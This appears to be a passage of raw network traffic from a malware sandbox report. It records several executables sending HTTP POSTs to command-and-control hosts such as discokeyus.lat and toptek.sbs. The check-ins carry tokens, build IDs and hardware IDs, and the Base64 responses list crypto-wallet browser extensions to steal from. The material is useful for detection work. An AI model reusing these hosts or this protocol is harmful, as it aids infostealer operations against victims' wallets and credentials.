                                                                                                                                                                                                                                                            2024-12-21 21:17:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------IMY5PH47QQ9ZM79H47QQContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------IMY5PH47QQ9ZM79H47QQContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------IMY5PH47QQ9ZM79H47QQCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:06 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:06 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                            Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.449830104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:08 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:09 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=7f8je9pj319alvjagbj6rjrj3r; expires=Wed, 16 Apr 2025 15:03:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Y%2FAOPpoYdrprlfqvkqX%2FDjuuIIswIJDrAulb%2BMXJTjBrWfDzJLXtDnU2%2FFpPlCORaQHlwTRisi06%2FsF8k8jYaWEpzfGfFFG62UzRjofsMMA%2BRrIcz0Npl3SiRAeXVIq4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae5b25d6f0cac-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1451&rtt_var=570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1879021&cwnd=232&unsent_bytes=0&cid=93239dbc9232ccc2&ts=1096&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            18192.168.2.44983194.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----PPHDJ58GDTRQQIMG47GL
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 35 38 47 44 54 52 51 51 49 4d 47 34 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 35 38 47 44 54 52 51 51 49 4d 47 34 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 35 38 47 44 54 52 51 51 49 4d 47 34 37 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------PPHDJ58GDTRQQIMG47GLContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------PPHDJ58GDTRQQIMG47GLContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------PPHDJ58GDTRQQIMG47GLCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:09 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:09 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            19192.168.2.449834172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:10 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 81
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:17:10 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=ACBF7AD21FC990D4AC8923850305D13E
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=srgshlqjmr51l1c3pa53neg0b1; expires=Wed, 16 Apr 2025 15:03:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9pydkIKX%2FHcmfht3Y7D97rxJDwYImYikn%2Fgsuoxiocgiw94JMsv3sJU8fUyMGcsSQadHwn0LtCsgHEuowx%2Btm7KkjFPPHcDOiSDPoEfT79RM%2Fkp7MAiz5zkFjoVGERC%2F9k%2BQIUts"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae5bedda51a17-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1813&rtt_var=710&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=984&delivery_rate=1510605&cwnd=128&unsent_bytes=0&cid=6669308c7e9bc731&ts=668&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC54INData Raw: 33 30 0d 0a 66 76 6c 42 67 39 52 35 54 49 62 73 47 46 73 2b 5a 46 63 77 51 52 4b 6f 77 4d 45 56 63 72 4d 33 6d 4c 41 45 71 52 65 44 4e 33 55 6c 70 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 30fvlBg9R5TIbsGFs+ZFcwQRKowMEVcrM3mLAEqReDN3UlpA==
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            20192.168.2.449836104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 47
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=k5hcv3m2tminf16u1r3f5m5epp; expires=Wed, 16 Apr 2025 15:03:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJYu7%2F7SlGVS6HaM0pNBAPC03mm%2Bk1mBkc6PiSMpcPWlvlDKjVXivUVEJpSrG7YGMO%2F3Q2pJdTHu4P2JUH2PRqZnE1M3FErZcB9%2BwubveTHyxZQEvvQdhxSMcFAiqIg2kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae5c24a9b42d7-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1767&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=1652518&cwnd=245&unsent_bytes=0&cid=dbd654819b6da6e9&ts=776&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC242INData Raw: 32 64 30 39 0d 0a 76 70 70 2f 55 38 4a 52 57 53 69 6d 51 2f 38 44 30 4c 51 2b 49 59 6c 61 64 79 6d 4e 6b 4f 2b 65 63 67 2f 34 39 55 69 75 36 50 48 46 75 41 6c 78 2b 47 56 31 43 74 55 6d 33 54 6d 6b 78 6b 74 45 70 58 67 57 54 61 2b 71 69 66 38 65 66 4a 33 5a 61 74 69 46 30 34 54 38 48 6a 2b 78 4e 48 55 4b 77 7a 76 64 4f 59 76 50 48 45 54 6e 65 45 30 4c 36 50 71 4e 2f 78 35 74 6d 5a 34 6e 33 6f 53 53 31 76 59 59 4f 36 63 79 50 55 6e 4b 4c 70 70 6d 74 64 56 55 54 2b 41 33 48 30 53 76 76 4d 33 37 43 43 33 43 31 77 58 4c 6e 4a 44 7a 2b 77 77 34 34 43 78 31 55 34 51 6d 6b 53 48 71 6c 6c 39 45 36 7a 59 52 54 65 62 34 68 2f 59 57 62 4a 79 66 4f 4d 65 4f 6d 64 62 34 47 7a 71 74 4f 79 6c 45 77 43 6d 52 59 4c 2f 56 48 41 32 72
                                                                                                                                                                                                                                                            Data Ascii: 2d09vpp/U8JRWSimQ/8D0LQ+IYladymNkO+ecg/49Uiu6PHFuAlx+GV1CtUm3TmkxktEpXgWTa+qif8efJ3ZatiF04T8Hj+xNHUKwzvdOYvPHETneE0L6PqN/x5tmZ4n3oSS1vYYO6cyPUnKLppmtdVUT+A3H0SvvM37CC3C1wXLnJDz+ww44Cx1U4QmkSHqll9E6zYRTeb4h/YWbJyfOMeOmdb4GzqtOylEwCmRYL/VHA2r
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1369INData Raw: 50 77 30 4c 74 37 4c 65 7a 68 4e 38 69 34 49 6e 33 49 7a 54 77 37 59 45 63 61 63 2f 65 78 4b 45 4b 5a 46 76 74 39 56 54 52 4f 6f 34 42 30 54 76 38 59 58 30 46 47 65 56 6d 43 58 43 67 4a 54 55 38 52 6f 2b 70 7a 73 39 52 63 64 68 30 79 47 31 7a 68 77 62 71 78 67 46 53 4f 7a 6d 67 4f 31 51 63 74 53 4f 61 73 75 47 30 34 53 34 47 7a 2b 68 50 6a 74 59 7a 43 71 57 5a 4b 44 64 56 55 37 6d 4f 42 68 42 34 50 47 4e 2b 78 70 6e 6c 5a 30 75 77 59 65 56 33 50 68 64 66 2b 41 30 49 77 71 63 59 62 35 6b 6f 74 46 51 56 61 6b 43 56 56 53 68 36 38 33 37 48 43 33 43 31 79 4c 4a 69 5a 44 58 39 78 34 35 71 79 45 37 57 4d 49 73 6d 48 4f 30 30 31 4a 4a 36 43 6f 66 52 65 6e 78 68 50 63 5a 61 4a 32 54 61 6f 4c 4b 6c 4d 53 34 52 58 47 42 50 6a 42 47 7a 6a 61 64 49 61 32 59 52 51 50
                                                                                                                                                                                                                                                            Data Ascii: Pw0Lt7LezhN8i4In3IzTw7YEcac/exKEKZFvt9VTROo4B0Tv8YX0FGeVmCXCgJTU8Ro+pzs9Rcdh0yG1zhwbqxgFSOzmgO1QctSOasuG04S4Gz+hPjtYzCqWZKDdVU7mOBhB4PGN+xpnlZ0uwYeV3Phdf+A0IwqcYb5kotFQVakCVVSh6837HC3C1yLJiZDX9x45qyE7WMIsmHO001JJ6CofRenxhPcZaJ2TaoLKlMS4RXGBPjBGzjadIa2YRQP
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1369INData Raw: 65 6e 39 67 50 42 51 49 39 71 51 4d 6f 7a 53 30 2f 62 37 43 54 4b 71 63 51 35 4a 79 69 2b 61 64 2f 4c 4a 45 6c 71 72 50 78 6b 4c 74 37 4b 41 2f 52 68 72 69 4a 67 6e 7a 34 53 64 30 2f 30 53 4f 61 41 7a 4e 6b 2f 41 4b 70 5a 69 76 39 4a 4f 53 65 73 77 45 45 72 6c 2b 4d 32 79 55 47 71 43 31 33 4b 4d 75 34 54 58 75 69 67 79 72 6a 30 38 58 49 51 2b 30 33 6a 79 30 56 41 44 73 33 67 59 51 2b 72 33 67 76 30 61 59 35 2b 64 4a 73 53 45 6b 4d 37 33 47 54 47 73 4f 7a 46 48 79 69 57 56 61 4c 6e 64 57 6b 50 71 4d 6c 55 46 72 2f 57 56 76 45 67 74 72 70 41 6d 77 59 58 52 36 66 73 54 50 36 63 6c 65 31 57 4b 4f 4e 31 6d 76 70 59 45 41 2b 63 78 46 55 44 6c 39 6f 33 37 48 57 69 5a 6b 43 6e 42 6a 5a 6e 53 2f 78 6b 39 71 54 34 39 53 73 4d 6c 6d 48 4f 33 33 31 42 50 71 33 5a 56
                                                                                                                                                                                                                                                            Data Ascii: en9gPBQI9qQMozS0/b7CTKqcQ5Jyi+ad/LJElqrPxkLt7KA/RhriJgnz4Sd0/0SOaAzNk/AKpZiv9JOSeswEErl+M2yUGqC13KMu4TXuigyrj08XIQ+03jy0VADs3gYQ+r3gv0aY5+dJsSEkM73GTGsOzFHyiWVaLndWkPqMlUFr/WVvEgtrpAmwYXR6fsTP6cle1WKON1mvpYEA+cxFUDl9o37HWiZkCnBjZnS/xk9qT49SsMlmHO331BPq3ZV
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1369INData Raw: 50 6c 55 47 71 57 31 33 4b 4d 67 35 72 4f 39 68 4d 34 72 54 55 7a 54 63 6f 73 6c 6d 65 35 30 56 74 46 35 6a 41 59 54 75 7a 7a 69 66 59 43 62 70 47 64 4a 38 62 4b 33 5a 7a 2f 42 58 48 34 63 78 78 47 37 54 47 47 63 36 53 57 51 77 33 79 65 42 4a 48 72 36 72 4e 2f 78 39 6b 6c 5a 38 69 77 34 57 58 30 76 34 62 50 4b 55 38 4d 56 6a 4d 4c 35 42 71 76 64 31 4f 51 2b 59 38 47 55 2f 6e 2b 59 65 38 58 69 32 64 6a 32 71 55 79 71 62 52 39 78 30 79 74 6e 4d 6b 42 4e 31 68 6d 6d 33 79 6a 68 78 50 35 54 67 61 52 2b 50 35 68 66 30 63 59 35 32 53 49 38 53 43 67 64 33 38 46 54 43 75 50 44 70 4f 77 53 53 5a 5a 72 62 51 55 77 4f 6c 65 42 4a 54 72 36 72 4e 30 7a 64 59 32 4c 59 51 6a 4a 58 64 78 62 67 61 50 65 42 72 65 30 62 48 4c 5a 56 75 74 4e 39 51 53 65 49 7a 47 55 44 72 2f
                                                                                                                                                                                                                                                            Data Ascii: PlUGqW13KMg5rO9hM4rTUzTcoslme50VtF5jAYTuzzifYCbpGdJ8bK3Zz/BXH4cxxG7TGGc6SWQw3yeBJHr6rN/x9klZ8iw4WX0v4bPKU8MVjML5Bqvd1OQ+Y8GU/n+Ye8Xi2dj2qUyqbR9x0ytnMkBN1hmm3yjhxP5TgaR+P5hf0cY52SI8SCgd38FTCuPDpOwSSZZrbQUwOleBJTr6rN0zdY2LYQjJXdxbgaPeBre0bHLZVutN9QSeIzGUDr/
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1369INData Raw: 69 6d 35 59 73 33 6f 32 61 7a 76 59 51 50 71 67 37 4d 6b 76 41 4a 4a 42 6e 76 74 78 64 52 4f 55 32 48 51 75 68 73 6f 72 6b 55 44 58 61 74 6a 72 58 6d 49 58 52 32 52 41 2b 34 43 78 31 55 34 51 6d 6b 53 48 71 6c 6c 56 52 37 7a 55 48 51 75 6a 38 67 76 38 43 62 4a 65 63 4f 4d 75 46 6c 39 76 30 47 7a 36 6d 4d 6a 35 41 79 43 61 59 61 72 33 61 48 41 32 72 50 77 30 4c 74 37 4b 6a 39 77 4e 36 6d 5a 6b 68 32 70 48 54 77 37 59 45 63 61 63 2f 65 78 4b 45 49 70 5a 71 74 74 5a 51 51 2b 38 31 46 56 6e 67 39 59 72 31 47 33 2b 51 6b 43 33 48 67 70 6a 54 2f 67 38 39 72 69 45 2b 57 4e 5a 68 30 79 47 31 7a 68 77 62 71 77 34 53 57 2f 2f 78 7a 38 30 47 62 6f 79 63 4a 38 44 4b 6a 4a 4c 68 58 54 61 73 63 32 4d 4b 77 69 36 55 59 72 33 58 56 55 2f 6d 50 52 78 4f 37 76 53 4a 39 68
                                                                                                                                                                                                                                                            Data Ascii: im5Ys3o2azvYQPqg7MkvAJJBnvtxdROU2HQuhsorkUDXatjrXmIXR2RA+4Cx1U4QmkSHqllVR7zUHQuj8gv8CbJecOMuFl9v0Gz6mMj5AyCaYar3aHA2rPw0Lt7Kj9wN6mZkh2pHTw7YEcac/exKEIpZqttZQQ+81FVng9Yr1G3+QkC3HgpjT/g89riE+WNZh0yG1zhwbqw4SW//xz80GboycJ8DKjJLhXTasc2MKwi6UYr3XVU/mPRxO7vSJ9h
                                                                                                                                                                                                                                                            2024-12-21 21:17:11 UTC1369INData Raw: 61 74 50 45 69 70 7a 2f 45 58 48 34 63 7a 68 4e 78 79 43 58 61 4c 37 5a 57 30 66 35 4d 68 4a 5a 37 76 4f 47 38 52 78 74 6c 35 6f 67 7a 59 4f 65 30 50 55 61 4e 71 38 32 65 77 53 45 4a 6f 55 68 36 70 5a 39 54 75 41 30 54 68 47 76 37 63 50 6c 55 47 71 57 31 33 4b 4d 69 70 6e 5a 38 68 41 79 72 7a 41 70 53 38 49 7a 6e 57 79 34 78 46 5a 49 37 6a 55 59 52 75 7a 30 69 2f 63 63 66 35 4f 58 4b 63 66 4b 33 5a 7a 2f 42 58 48 34 63 78 68 64 30 69 75 61 62 61 54 64 58 55 44 39 4e 51 55 4c 6f 62 4b 63 2b 77 45 74 77 6f 45 36 32 34 32 4d 6b 75 46 64 4e 71 78 7a 59 77 72 43 4b 4a 74 6d 74 4e 68 4f 52 75 30 33 47 6b 4c 6d 39 6f 58 2f 45 47 6d 65 6b 43 2f 50 68 70 6a 62 2b 78 49 31 71 54 30 79 52 59 52 76 33 57 61 71 6c 67 51 44 79 69 4d 57 52 2b 4b 79 6b 72 49 4a 4c 5a 32
                                                                                                                                                                                                                                                            Data Ascii: atPEipz/EXH4czhNxyCXaL7ZW0f5MhJZ7vOG8Rxtl5ogzYOe0PUaNq82ewSEJoUh6pZ9TuA0ThGv7cPlUGqW13KMipnZ8hAyrzApS8IznWy4xFZI7jUYRuz0i/ccf5OXKcfK3Zz/BXH4cxhd0iuabaTdXUD9NQULobKc+wEtwoE6242MkuFdNqxzYwrCKJtmtNhORu03GkLm9oX/EGmekC/Phpjb+xI1qT0yRYRv3WaqlgQDyiMWR+KykrIJLZ2
